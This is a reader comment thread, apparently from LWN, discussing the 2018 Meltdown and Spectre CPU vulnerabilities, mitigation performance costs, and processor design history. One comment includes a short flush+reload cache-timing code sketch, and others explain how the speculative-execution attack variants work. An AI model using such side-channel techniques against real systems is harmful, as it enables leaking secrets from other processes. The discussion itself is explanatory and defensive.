Even if vendors manage to plug all the stuff in the Spectre paper, a big question is whether there are more big "leaking secrets through hidden CPU state using side channel" attacks that will be found soon, now that everyone's looking. I wouldn't bet against it. In which case we could be in for a long period of scrambling, patching, and performance-eroding mitigations.

more vulnerabilities to be found

Posted Jan 4, 2018 22:54 UTC (Thu) by jcm (subscriber, #18262) [Link]

Indeed. I co-led the mitigation team within Red Hat for some time on this issue. It's allowed for a few productive conversations around potential future research. I've already spoken with those involved in this research, and similar related efforts. Red Hat turned up to MICRO50 last year, which wasn't an accident. I'm trying to drive more direct engagement with the architecture community, especially now that we can work with the vendors and researchers to help find the next one. I'd really like it to be RH finding it next time.

more vulnerabilities to be found

Posted Jan 4, 2018 23:07 UTC (Thu) by roc (subscriber, #30627) [Link]

I hope you and your colleagues in the early-disclosure zone are reflecting on whether the "patch and pray" approach to stopping these leaks is sustainable long-term. For example, it was pointed out that retpolines break Intel's CET, i.e. one mitigation stomps on another. Each mitigation makes the system more complex and fragile ... and a lot of them make it slower, too.

I realize you have to do these mitigations for now, but I think some serious long-term thinking needs to be going on alongside the stop-gap work.

more vulnerabilities to be found

Posted Jan 4, 2018 23:20 UTC (Thu) by roc (subscriber, #30627) [Link]

Er, retract that CET point. Apparently it is possible to have a CET-compatible retpoline.

more vulnerabilities to be found

Posted Jan 4, 2018 23:14 UTC (Thu) by rahvin (guest, #16953) [Link]

But the hardware fix is not a quick fix and the concern is of course about permutations of this attack that exploit similar functions.

Spectre appears to lie at the heart of CPU design assumptions and will likely be around causing problems for a very long time as people figure out new ways to do the same thing using various other similar assumptions. As someone else said the person that came up with this was brilliant and it's going to have very far reaching consequences.

Notes from the Intelpocalypse

Posted Jan 4, 2018 3:08 UTC (Thu) by vstinner (subscriber, #42675) [Link]

The article title is misleading. The article says "Intel, AMD, and ARM processors are all vulnerable (in varying degrees) to this attack." Why focus only on Intel? The bug affects multiple CPU vendors.

Notes from the Intelpocalypse

Posted Jan 4, 2018 6:51 UTC (Thu) by comicfans (subscriber, #117233) [Link]

https://meltdownattack.com/meltdown.pdf takes an Intel CPU as the attack target and successfully leaks kernel information; it can also use Intel TSX to get higher channel capacity. For AMD and ARM: "We also tried to reproduce the Meltdown bug on several ARM and AMD CPUs. However, we did not manage to successfully leak kernel memory with the attack described in Section 5, neither on ARM nor on AMD." ... "However, for both ARM and AMD, the toy example as described in Section 3 works reliably."

Notes from the Intelpocalypse

Posted Jan 4, 2018 7:42 UTC (Thu) by roc (subscriber, #30627) [Link]

Yes, I think the title is a bit harsh. Meltdown may be Intel-specific, but the underlying issues certainly aren't.

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:23 UTC (Thu) by valberg (guest, #83862) [Link]

I agree. The title is very misleading (and actually unfair) and should be corrected.

Notes from the Intelpocalypse

Posted Jan 4, 2018 3:34 UTC (Thu) by atelszewski (guest, #111673) [Link]

Hi,

I would love to hear an authoritative statement on how all of this affects single-user desktops.

What is the attack channel?
For example, JavaScript in a browser?
If so, how long would it take to extract useful data?

No doubt it is a serious thing, because many (most?) of the services we rely on are somewhere out there, in multi-user (server) environments.

But, how safe are my locally kept passwords?
(Except for those I transmit to my banks website ;-)).

--
Best regards,
Andrzej Telszewski

Notes from the Intelpocalypse

Posted Jan 4, 2018 4:27 UTC (Thu) by corbet (editor, #1) [Link]

There is, for example, this advisory from Mozilla on how it could be used to access information in a web browser.

Notes from the Intelpocalypse

Posted Jan 4, 2018 4:43 UTC (Thu) by atelszewski (guest, #111673) [Link]

Hi,

Wow, I wouldn't have ever thought that browsers allow for sub 1-ms time measurements.
Well, with the current state of affairs, everything is possible (vide WebUSB).

Thanks.

--
Best regards,
Andrzej Telszewski

Notes from the Intelpocalypse

Posted Jan 4, 2018 17:13 UTC (Thu) by mtanski (subscriber, #56423) [Link]

If you're generating live audio in the browser, you need sub-ms precision. After all, 44.1kHz is ~44 samples per ms.

Notes from the Intelpocalypse

Posted Jan 4, 2018 18:20 UTC (Thu) by atelszewski (guest, #111673) [Link]

Hi,

I wouldn't dare to think that you can build audio samples in JavaScript.
What about latency? Are the browsers using some real-time scheduling?

My assumption is that performance.now() is a JavaScript thing,
but I haven't verified this.

--
Best regards,
Andrzej Telszewski

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:41 UTC (Thu) by mtanski (subscriber, #56423) [Link]

If it can be done, somebody has done it in JS. There's even a browser audio API: http://papers.traustikristjansson.info/?p=486

Separate privileges, separate caches

Posted Jan 4, 2018 9:07 UTC (Thu) by epa (subscriber, #39769) [Link]

Since cache timing will always be visible to code (unless you mandate a restricted programming language that cannot precisely measure its own time taken) the only way to fix this in general is to have separate caches for each separate privilege level. As a minimum one for kernel mode and one for user mode. As a small improvement, kernel mode could read the userspace cache (but not write to it) while userspace would have no access to the kernel cache at all.

Since CPUs don't currently support this, the way to emulate it is to flush the cache on each context switch from kernel to user space. This would slow things down. It might require rewriting some kernel APIs to be 'fatter' so that a single call does more work before returning, and you don't need as many context switches.

Separate privileges, separate caches

Posted Jan 4, 2018 11:28 UTC (Thu) by excors (subscriber, #95769) [Link]

These attacks are using the cache as a side channel to leak data from the speculatively-executed instructions to the non-speculative world, but I don't think that's the only possible side channel. E.g. maybe you could use a variable-speed instruction like division ("1 / (v & 1)" etc) and use another hyperthread to measure how long the execution unit is busy for. Or maybe you could use a constant-speed expensive SIMD instruction where certain input values cause lots of transistors to flip between 0s and 1s repeatedly, generating more heat, so you run it in a loop then measure the temperature of the CPU core. (Maybe that one is less plausible). The cache is completely irrelevant in those cases, so you can't fix it by changing the cache design.

Separate privileges, separate caches

Posted Jan 4, 2018 16:06 UTC (Thu) by epa (subscriber, #39769) [Link]

Wasn't there already a known information leak with hyperthreading, leading the OpenBSD developers to recommend that you disable it?

Perhaps the cache is not the only thing that lets you snoop but it is certainly a major one.

Separate privileges, separate caches

Posted Jan 4, 2018 21:45 UTC (Thu) by emaste (guest, #121005) [Link]

You may be thinking of the hyperthreading cache side-channel reported by Colin Percival, with a mitigation first in FreeBSD back in 2005. Those details are at http://www.daemonology.net/hyperthreading-considered-harm..., and the paper is at http://www.daemonology.net/papers/htt.pdf.

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:09 UTC (Thu) by olivlwn (guest, #100387) [Link]

Well done!

Regarding PTI, based on articles on Phoronix it seems that the performance cost is not so bad. TBC.

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:50 UTC (Thu) by nix (subscriber, #2304) [Link]

Typical Phoronix article though. Video encoding and compiling aren't much affected: well, of course not, they hardly transition to kernel space at all! FSMark drops by more than 50% in some tests. 50%! From a single mitigation!

Sorry, if you do anything with the fs the performance cost is clearly appalling, since FSMark isn't *that* synthetic: things like big find(1)s are fairly similar to FSMark in that all they really do is ask the kernel for things lots and lots of times. (Of course, they are also disk-bound operations, so maybe the performance cost is only visible once you have a hot cache, or if you use an SSD.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 12:15 UTC (Thu) by bojan (subscriber, #14302) [Link]

If I remember correctly, these figures are similar to what grsecurity was getting with du -s. Pretty scary to think that some things may take twice the time, but that seems to be the reality...

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:32 UTC (Thu) by ortalo (guest, #4654) [Link]

Why scary? It depends. For example, I would love to see the duration between my birth and my death take twice the time originally specified...
But joking aside, this performance penalty has to be balanced against the actual security needs - and you may try alternative implementations (e.g. with another CPU, another software configuration, etc.).

Notes from the Intelpocalypse

Posted Jan 4, 2018 13:45 UTC (Thu) by MarcB (subscriber, #101804) [Link]

In general, any workload in which the fixed costs of syscalls are a significant share will be impacted strongly.

This can be filesystem operations, but also socket operations or - as it turns out - mprotect.

On one system I am observing about 10 million calls to mprotect per minute (not sure if this is sane). The workload should theoretically be low on syscalls, but it is not. mprotect is followed by futex, nanosleep, and then the expected read at around 160k/minute.

Perhaps a good thing that will come of this is a review of some applications' use of syscalls.

The following can give you an idea. It will sample for 60 seconds:

    perf stat -e 'syscalls:sys_enter_*' -a sleep 60 2>&1 >/dev/null | sort -n

Notes from the Intelpocalypse

Posted Jan 4, 2018 17:20 UTC (Thu) by mtanski (subscriber, #56423) [Link]

Video/audio encoding, gaming, and other mostly CPU-bound applications will be minimally impacted. Applications that do a lot of syscalls will be impacted quite a bit.

My estimate is about 10% to 15% in real-world OLTP database workloads. Databases end up doing a mixture of network and disk IO. Most OLTP queries get or return only a handful of tuples, so execution time is dominated not by CPU but by disk IO. There's usually also a random read pattern (btrees, index indirection). The faster the disk device (a 100k+ IOPS device), the more impact this will have.

To make this into a one-two punch, the KPTI mitigation requires flushing of the TLB. Databases often end up doing quite a bit of caching in userspace, again with non-ideal locality (random placement), so this will further impact them.

Notes from the Intelpocalypse

Posted Jan 6, 2018 19:07 UTC (Sat) by JanC_ (guest, #34940) [Link]

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:17 UTC (Thu) by jtaylor (subscriber, #91739) [Link]

Speculative execution has been around in CPUs for more than a decade, and timing attacks on CPU caches are not new either. I wonder why it took so long to figure this flaw out. Is there something else new involved in these attacks?

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:53 UTC (Thu) by marcH (subscriber, #57642) [Link]

> Is there something else new involved in these attacks?

Attention to security issues and funding of research grew from basically zero to almost measurable?

Even today old and unsafe programming languages are still the most popular and closed source software is still king.

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:25 UTC (Thu) by gdt (subscriber, #6284) [Link]

Is there something else new involved...

What's new is the people. When crypto instructions arrived in CPUs, cryptography researchers brought their side-channel concerns with them when analysing the CPUs' crypto implementations (eg, CacheBleed). They then applied those side-channel concerns to other aspects of CPU security. What's new here is using speculative execution as the side channel (and discovering a more severe flaw in Intel CPUs whilst doing that work).

As usual there's a small number of academic cryptographers and computer scientists at the beginning of the trouble. A good start would be the papers here. On the plus side, they've reclaimed the phrase "industry disruption" from its misuse by venture capitalists.

Those researchers are of the view that microarchitecture design lacks the design rigour that cryptographic semiconductor designers usually apply to limit side channels. Re-engineering semiconductor design processes to add such rigour after the fact isn't going to be a fast or fun ride.

Notes from the Intelpocalypse

Posted Jan 4, 2018 15:09 UTC (Thu) by excors (subscriber, #95769) [Link]

> What's new here is using speculative execution as the side-channel

It seems to me like the side channel is simply the cache, which was already well known as a way for two malicious processes to communicate, and as a way for a malicious process to spy on the memory-access behaviour of an innocent process.

What's new is that an innocent process can be tricked into (speculatively) fetching sensitive data then revealing that data through some side channel, because the CPU's speculative execution will happily ignore the innocent code's validity checks that should have restricted what data it can fetch, or will happily ignore the innocent code's intended control flow and start executing arbitrary instructions. A similar attack could (in theory) work with other non-cache-related side channels to leak the data once it's been fetched.

Also what's new is someone doing the proof-of-concept work to demonstrate it's a real problem, rather than just expressing vague suspicions about how dodgy the whole thing feels.

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:07 UTC (Thu) by ortalo (guest, #4654) [Link]

It's probably a covert channel then, as in J. K. Millen, “Covert Channel Capacity”, in IEEE Symposium on Security and Privacy, Oakland, 1987.
Covert channel identification and control was already in the TCSEC security evaluation criteria in the 80s (the so-called "Orange Book") for multilevel-security operating systems; so even if the present concerns are indeed new, the whole problem sounds in fact very old to me.
In secure multiuser (or, more precisely, multiprogramming IIRC) systems, covert channels may exist wherever a resource is shared between programs running at different security levels. Obviously, current systems share many more resources between processes (at much higher frequencies) than in the past: CPUs, threads, caches (multiple levels), etc., so the opportunity for covert channels is very high. And virtualization systems only widen the possibility for untrusted code to demand code execution in a more privileged context.

Finally, the biggest security concern for me is not the existence of these vulnerabilities but another question: why in the hell have these old security requirements been put aside deliberately for 2 decades? Only really young people should have an excuse for ignoring those unwillingly (and they have none anymore ;-).

As an added comment, note that these issues surface and gain traction because exploits are implemented. Why not put more effort into protecting our systems from covert channels instead of, once again, starting by investing time into breaking them with tricky low-level programming?

Notes from the Intelpocalypse

Posted Jan 4, 2018 19:12 UTC (Thu) by mtaht (guest, #11087) [Link]

As I recall, the only way to get a B1 rating was to disable networking entirely. Even C2 was hard - and it was so long ago (90?) for me that I cannot remember the requirements or differences between these levels. Though I think this year might be a good time to re-read them.

I do seem to recall that databases had to have *row-level* security labels... but my opinion then, as now, was that orange book was unimplementable for usable systems.

Notes from the Intelpocalypse

Posted Jan 5, 2018 9:38 UTC (Fri) by ortalo (guest, #4654) [Link]

I think your summary is too negative. Admittedly, the Orange Book requirements (and academic security requirements in general) have always been high and ambitious; but the primary reason they appear unachievable today is that so many people lowered their own security requirements so far in the meantime that decades-old objectives sound impossible.
B1 (or ITSEC E5+ or CC EAL5+) systems are achievable with networking - of course. The Orange Book et al. requirements are too old to be used as-is, but the way they were built and designed should not have been thrown away carelessly since, IMHO, they were much more pertinent to computer security than many recent useless recipes. E.g. I keep on repeating that vulnerability analysis is only the last ten percent of the security work, and that most effort should be spent on protection design, not on breaking things. Yes, I know, I said it once again - it must be senility lurking. (Or is it disinformation? :-)
And sometimes the tools are even already here. The main difference between the B and C levels is the multilevel mandatory policy. Mandatory policy mechanisms have come back in mainstream Linux systems. Row-level security mechanisms are available in mainstream PostgreSQL, etc. And everyone sees that they are not so easy to use as-is, so more work would be needed to make them usable. But in fact, very logically given the technology improvements, some implementations have already advanced much further than what these decades-old standards were proposing.
What is misleading is the way the general objective of computer security has been twisted. The end user should trust the system. Several lines of defense should be installed. Security kernels (TCBs) and their properties should be well defined (and realistic). Security documentation should be available (including for the vulnerabilities). These objectives were present in the old books. Hopefully they are still present in many works, but they do not seem to attract the most valuable effort (typically money). Maybe they were not as well defined as their writers thought - but I also think too few people fought for them.

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:56 UTC (Thu) by cesarb (subscriber, #6266) [Link]

> because the CPU's speculative execution will happily ignore the innocent code's validity checks that should have restricted what data it can fetch, or will happily ignore the innocent code's intended control flow and start executing arbitrary instructions.

The most fascinating part is that this is an "impossible execution": you have code which can never read out of bounds, since every possible flow into it checks the bounds; yet, in some imaginary world dreamed up by the CPU's pipeline, the out-of-bounds read actually happens.

That reminds me of undefined behavior, which is also something which by its definition cannot ever happen (and compilers optimize accordingly), yet sometimes happens, leading to bizarre results following some sort of dream logic.

Notes from the Intelpocalypse

Posted Jan 5, 2018 9:51 UTC (Fri) by ortalo (guest, #4654) [Link]

It is fascinating until the associated CPU starts to talk about driving the car, landing the plane, counting the ballots, talking to the kids in their bedroom, policing the street and more generally acting on your behalf all the time. Then the fascination turns into fear. Not of the CPU itself by the way - but of the way other humans could take advantage of this undefined behaviour.

Notes from the Intelpocalypse

Posted Jan 5, 2018 8:12 UTC (Fri) by Yenya (subscriber, #52846) [Link]

> Is there something else new involved in these attacks?

Two things:

- widespread use of virtualization ("cloud computing"), i.e. running someone else's native code on our CPUs.
- widespread use of JIT engines in Javascript and other languages, in which - again - someone else's code is run on our CPUs.

Notes from the Intelpocalypse

Posted Jan 5, 2018 23:41 UTC (Fri) by kiko (guest, #69905) [Link]

C'mon, our CPUs are always running somebody else's code. Do you think third-party code was safer in the DOS days? That's not the issue at hand. The problem is that CPUs and software have gotten so complex that our established security patterns -- for instance userspace/kernel separation -- are becoming increasingly insufficient to provide a reasonably secure computing environment.

And yeah, having so many computers and services addressable on the Internet provides scale for making complex or expensive attacks realistic to the point of being trivial.

Notes from the Intelpocalypse

Posted Jan 4, 2018 10:47 UTC (Thu) by flussence (subscriber, #85566) [Link]

Time to re-re-re-relearn an important lesson: letting random strangers run arbitrary code on Someone Else's Computer is dangerous. Especially if that someone else is you, and you're not aware it's happening.

For browser authors: you went out of your way to make life exceptionally difficult for people who don't want to be involuntarily opted in to this kind of blind trust, and you kept digging this hole after Rowhammer. Is it worth it for this kind of fallout? Will it be worth whatever comes next?
It would be poetic justice if one of the first uses of this exploit were to leak EME private keys.

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:20 UTC (Thu) by roc (subscriber, #30627) [Link]

It's not exceptionally difficult to disable Javascript.

Even if removing Javascript from the browser entirely were a good idea in the abstract, there are a couple of problems. One is that all users would immediately switch to a competitor browser, possibly an earlier version from the same vendor.

Another, even deeper problem is that the only alternative to run-by-default execution of untrusted code is some kind of trusted gatekeeper like the app stores have. (Don't say users should decide; they mostly can't.) But those gatekeepers don't work very well, and they put too much power in the hands of Google and Apple.

Notes from the Intelpocalypse

Posted Jan 6, 2018 18:52 UTC (Sat) by flussence (subscriber, #85566) [Link]

I know a JS-free web will never happen, it's too impractical, it's some people's dayjob, etc. The sky is falling, I don't have a good answer and I don't expect anyone does right now.

Maybe we could, for a start, treat CPU-hungry webpages with a bit more paranoia than passive event-driven ones? There's sufficient fine-grained security for the latter group, but all we've had for the former is sledgehammers like NoScript, or whack-a-mole solutions like that one coinhive-blocking extension. Enumerating badness isn't sustainable; there has to be a better way.

I wouldn't mind having fewer reasons to allow JavaScript in the first place, though. Google should be busy restoring their MathML support after this week, for one.

Notes from the Intelpocalypse

Posted Jan 4, 2018 13:35 UTC (Thu) by freemars (subscriber, #4235) [Link]

Jon, I'm glad you (and the kernel crew) are on this. Someone needs to care about security... even if Intel doesn't.

Could paranoid applications (i.e. all of Tails) take advantage of the unlikely() directive to force the CPU to take the longer route every time and stop timing attacks?

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:25 UTC (Thu) by Paf (subscriber, #91811) [Link]

No, most obviously because that directive is optional and is ignored (or compiled out, I think) when it suits the CPU.

Also, I don’t think that would work anyway - you could force the speculative execution down a particular path but it isn’t necessarily the right one. Someone could still exploit that. Right...?

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:47 UTC (Thu) by excors (subscriber, #95769) [Link]

unlikely()/__builtin_expect() doesn't force anything - it's just a hint to the compiler, which might arrange code more efficiently and might emit instructions with hints for the CPU (which the CPU might use or ignore).
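
For illustration, this is roughly what such a hint looks like (a minimal sketch; the macro mirrors the usual kernel-style definition, but bounds_check() and its arguments are hypothetical):

    /* unlikely() is just a compiler hint built on __builtin_expect();
       it may move the cold path out of line, but it cannot keep the
       CPU from speculating into it. */
    #define unlikely(x) __builtin_expect(!!(x), 0)

    int bounds_check(unsigned long offset, unsigned long limit)
    {
        if (unlikely(offset >= limit))
            return -1;    /* laid out as the cold path, perhaps */
        return 0;         /* speculation may still run past the test */
    }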

The "variant 1" attack seems to rely on the target process(/kernel) containing code that reads memory from an attacker-controlled address, after checking the address for validity. The CPU might speculatively perform the read and process that data in an observable way, even if the validity check fails and it's reading sensitive data. To prevent that, I guess you need to put something between the validity check and the read to prevent speculation, like a "cpuid" instruction on x86. But that can be very expensive (hundreds of cycles), and I don't know how you'd find all the places you need to put it.

The "variant 2" attack seems to rely on the target process(/kernel) containing an indirect jump instruction, which can be tricked into predicting an attacker-controlled location and speculatively executing dangerous code. It sounds like the -mindirect-branch=thunk-extern GCC patches could be enough to prevent that.

We need alternate approaches

Posted Jan 4, 2018 14:37 UTC (Thu) by mtaht (guest, #11087) [Link]

I have been saying for many years now that the system is rotten to its cores, and that lines of research we had in the 90s (like capability architectures) needed to be resumed, tools for creating hardware made more robust and open, and critical systems protected by diversity in the ecosystem.

Last night, after reading the relevant papers on these new attacks, I started reminiscing fondly about the days when I used an old DEC Alpha as a firewall merely because I had more confidence it would be harder to exploit than anything else, just by being different.

I can't help but reflect on the characteristics of my favorite (sadly, still slideware) alternative CPU, the Mill.

It's a single address space in the first place (no aliasing); memory protection is to the byte, not the page (and done in a separate unit from the TLB) - and the cache is virtual, not physical.

There are no syscalls per se; instead there is an explicit (and fine-grained) capability-gaining (or -dropping) portal call, almost exactly like a subroutine.

The stack is protected from ROP. Stack and registers leave no rubble behind that can be peered at on call or return (there are few registers, as we know them, either), and further, malloc and free can be jiggered not to reuse memory quickly, or to always return zeroed memory, at a usable and very low cost.

The Mill equivalent of speculative execution is an intrinsic, well-documented part of the exposed processor pipeline: an explicit value (NaR = "not a result") is dropped on "the belt" when there is the equivalent of failed speculative execution. There isn't a conventional BTB, either (branch exits are predicted via an undefined mechanism).

In short, I think the Mill, as the closest thing to a pure capability architecture that exists today, could have (at least on paper) been invulnerable to this string of attacks (but of course vulnerable to other things not yet thunk up).

There are, of course, many other possible architectures and ideas out there; the important thing is to recognize that it's long past time to try building them rather than endlessly patching warts on top of warts.

PS:

And I'm hating the workarounds posted thus far, because latencies are going to jump once again on servicing interrupts, and that breaks a lot of assumptions in (for example) the virtualized networking space - and interrupt handling and context switches were already orders of magnitude too slow for my taste and my favorite user-facing applications.

Notes from the Intelpocalypse

Posted Jan 4, 2018 15:49 UTC (Thu) by JFlorian (guest, #49650) [Link]

I'm not going to claim I understand any of this all that well, but it is clearly going to prove a significant disruption. It's also clear that complexity got the better of us and I fear it will be "resolved" through ever more complexity.

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:21 UTC (Thu) by ortalo (guest, #4654) [Link]

I am not sure this will disrupt much in the near term. So many users are so used to seeing their computing devices' security compromised that they do not even complain anymore.
Plus, hardware vendors do not seem to me to be the biggest culprits here. Why was speculative execution introduced in the first place? Because software programmers did not want to use complex compilation techniques (involving, e.g., data profiling or variant programming) and the software industry did not want to pay for advanced development tools (and possibly new languages, new compilers, etc.). Hardware-level runtime optimization was seen as good enough. Well, it may be, but maybe you lose more in the process than you think (especially predictability).

"Good enough" has always been a very problematic strategy for security-critical computing. But why would such a state of affairs be perturbed? (I hope it will be, but I do not see why, unless all users finally start to see some kind of new light and put actual money on it - or, more probably, pull it out of not-good-enough systems and teams.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:30 UTC (Thu) by epa (subscriber, #39769) [Link]

Intel did have a good try at removing speculative execution from the processor: with Itanium, as I understand it, any speculative load instructions have to be put in by the compiler explicitly. As you say, it didn't take off because nobody could be bothered to switch to the advanced compiler technology needed. (Well, there may be other reasons why Itanic sank, and in some ways we are better off not having an Intel-proprietary instruction set, but certainly industry inertia was part of it.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 17:23 UTC (Thu) by pizza (subscriber, #46) [Link]

> Because software programmers did not want to use complex compilation techniques (involving, e.g. data profiling or variants programming) and the software industry did not want to pay for advanced devleopment tools (and possibly new languages, new compilers, etc.).

That's disingenuous.

The simple fact of the matter is that those "complex compilation techniques" didn't exist at the time, and still don't exist today. And it's not for lack of trying. Intel spent many billions of dollars trying to make this work, and made some progress -- but it turned out that the hardware could do a better job at runtime than the compilers could at compile time -- because, as it turns out, at runtime one has the advantage of knowing the *data* the software is dealing with, while at compile time one doesn't.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:57 UTC (Thu) by roc (subscriber, #30627) [Link]

This is completely right.

Also, Itanium would not have been immune to Spectre. Itanium included speculative load operations, and in the "Spectre variant 1" attack, the compiler might well have hoisted the problematic loads above the bounds check precisely to get the performance benefit that an out-of-order CPU gets by speculatively executing those loads.

Notes from the Intelpocalypse

Posted Jan 5, 2018 6:59 UTC (Fri) by epa (subscriber, #39769) [Link]

Right - but on Itanium it would be more straightforward to fix, since you could set a compiler flag to just remove speculative load instructions from the kernel (as a quick fix), adding them back where they are proven safe. Indeed, the compiler could be taught not to speculatively lift loads outside bounds checks.

In user space, I imagine that the explicit speculative load instruction used on Itanium does do all the same memory access checking as an ordinary non-speculative load, so it can't be used to snoop in the same way as the hidden speculative execution on x86_64.

Notes from the Intelpocalypse

Posted Jan 5, 2018 10:12 UTC (Fri) by ortalo (guest, #4654) [Link]

Well, maybe I am somewhat disingenuous; admittedly, back then the hardware-based solutions looked better. But I have to question everything, including whether the most prominent hardware vendor of that time really did try to favor software development tools over its own silicon-oriented intellectual property - don't you think?
Anyway, I would love to be proven wrong and see some of this past research resurrected as a nice powerful-enough deterministic processor and the associated innovative software development environment for current and near-future critical systems. In my opinion, now is the right time, and many would certainly consider helping (in good faith, I assure you ;-).

Notes from the Intelpocalypse

Posted Jan 5, 2018 11:16 UTC (Fri) by roc (subscriber, #30627) [Link]

Your second paragraph seems to be talking about Meltdown, but Spectre 1 is still a problem for user-space applications. It is probable that Meltdown wouldn't have worked on Itanium.

FWIW, in C I don't think it's easy to tell what is a bounds check or which loads are guarded by which checks.

I agree that it would be a bit easier to fix these specific issues on Itanium. I don't think that makes this an "Itanium should have won!" moment.

Notes from the Intelpocalypse

Posted Jan 7, 2018 16:02 UTC (Sun) by mtaht (guest, #11087) [Link]

The discussions over at comp.arch (https://groups.google.com/forum/#!forum/comp.arch) have been quite informative.

And it does look like the Mill was invulnerable by design to Spectre/Meltdown. They did find and fix a bug where the compiler could lift a memory access ahead of its guard, but as near as I can tell that would have caused a segfault rather than a permissions violation.

Does Red Hat's updates fix everything?

Posted Jan 5, 2018 1:50 UTC (Fri) by dowdle (subscriber, #659) [Link]

Red Hat mentions three CVEs that are fixed. The three issues they talk about are very similar to those mentioned by Jon. I can't say I did a really good comparison, but hopefully I skimmed it well enough.

Anyway, Jon said:

Getting around boundary checks - "There is no straightforward defense to this attack, and nothing has been merged to date."

Messing with indirect jumps - "As of this writing, no defenses have actually been merged into the mainline kernel."

Forcing direct cache loads - "The answer here is kernel page-table isolation"

So... given Red Hat's updates and their reports of fixing everything (although they say that software isn't a complete fix for the hardware issues)... has Red Hat come up with their own fixes? Are they using something that was submitted but not yet accepted upstream? What? Do these fixes actually work for the first two or not? I guess the proper folks to ask would be Red Hat, but I'm sure there are plenty of people here who would like to know the answers too. Hopefully someone can elaborate, because there is a lot of confusion going around... and lots of articles and whatnot... but it's not clear what is accurate signal and what is noise.

Does Red Hat's updates fix everything?

Posted Jan 5, 2018 4:43 UTC (Fri) by roc (subscriber, #30627) [Link]

The situation is incredibly confusing even if you spend significant time trying to follow the details.

You've got Intel releasing microcode updates (when?) and basically saying "we've fixed everything", various Linux kernel patches in flight, and Amazon and Google saying "we've fixed all our stuff", yet it's completely unclear what mitigations are actually being deployed, which bugs they think they're fixing, and what they're assuming everyone else has to do. Meanwhile it's very clear from the Spectre paper that the attacks they and Project Zero identified are probably just the tip of an iceberg. What's being done about the iceberg?

Does Red Hat's updates fix everything?

Posted Jan 6, 2018 2:09 UTC (Sat) by rahvin (guest, #16953) [Link]

> What's being done about the iceberg?

The first mates (there is no captain) are panicking and trying to figure out where the iceberg is and how big it is, but understand it's the middle of the night in a fog bank and they might not know for quite a while. The barrelman saw the iceberg and wrote a report about it, but wasn't quite sure whether he saw the whole thing or even whether there is more than one. The sailors are trying to patch the hole from the first strike that is dumping water into the boat, but all they've got to fix it with is some leftover bread. The engineer in the engine room claims he already avoided the iceberg and has issued a full-steam-ahead order, and the 200 helmsmen are busy steering in some direction they think the iceberg isn't.

Meanwhile, half the press is running up and down the deck yelling that everyone is dead, the other half is telling everyone there is nothing to worry about, and the passengers are in the dining room without a care in the world.

Does Red Hat's updates fix everything?

Posted Jan 6, 2018 18:38 UTC (Sat) by bronson (subscriber, #4806) [Link]

And there may be one iceberg or there may be hundreds -- we can't tell now. These icebergs are catastrophic for some boats but pretty much irrelevant for others. And the proposed solutions will cut the top speed of all boats by 7 to 30%. Or 2 to 12%, or 10 to 50, or something. Depends on when you ask, the numbers are changing daily.

We don't even know if the icebergs have their own power and can hunt down boats on their own.

Notes from the Intelpocalypse

Posted Jan 5, 2018 8:31 UTC (Fri) by tdz (subscriber, #58733) [Link]

Excellent article, thank you.

Notes from the Intelpocalypse

Posted Jan 17, 2018 15:28 UTC (Wed) by mopcua (guest, #121648) [Link]

"An exploit can fetch the data at both 0x200 and 0x300 and compare the timings."

How can the exploit fetch this data? Is it in user space, or is it fetched via some getter provided by the kernel?

Notes from the Intelpocalypse

Posted Jan 17, 2018 15:48 UTC (Wed) by excors (subscriber, #95769) [Link]

You wouldn't want to really use 0x200 - that's just a simplified example of the concept. You'd use an address that is mapped into the attacker's userspace process, so the attacker can trivially read it. The Project Zero example does an eBPF array access with a bogus index that points to a massively-out-of-bounds element at a userspace address.
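
For the curious, the timing half looks roughly like this (a simplified flush+reload sketch using x86 intrinsics; a real exploit needs to worry about noise, thresholds, and serialization):

    #include <stdint.h>
    #include <x86intrin.h>   /* _mm_clflush(), __rdtscp() */

    /* Flush the probe line, let the victim speculate, then time a
       load: a fast reload means the victim touched that line. */
    static uint64_t probe_time(volatile uint8_t *addr)
    {
        unsigned int aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*addr;                  /* the timed access */
        uint64_t t1 = __rdtscp(&aux);
        return t1 - t0;               /* small delta => cache hit */
    }

    /* Beforehand: _mm_clflush((void *)addr); to evict the line. */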

Notes from the Intelpocalypse

Posted Jan 19, 2018 14:40 UTC (Fri) by brokenstapler (guest, #121720) [Link]

The Meltdown fix is not going nearly as well as expected. Intel made a comment that explains a bit about what's going on and why the fix isn't going as smoothly as one might have hoped. Further reading is available if you want (Ars, HN, etc.), but it's just going to make you sad.


Copyright © 2018, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds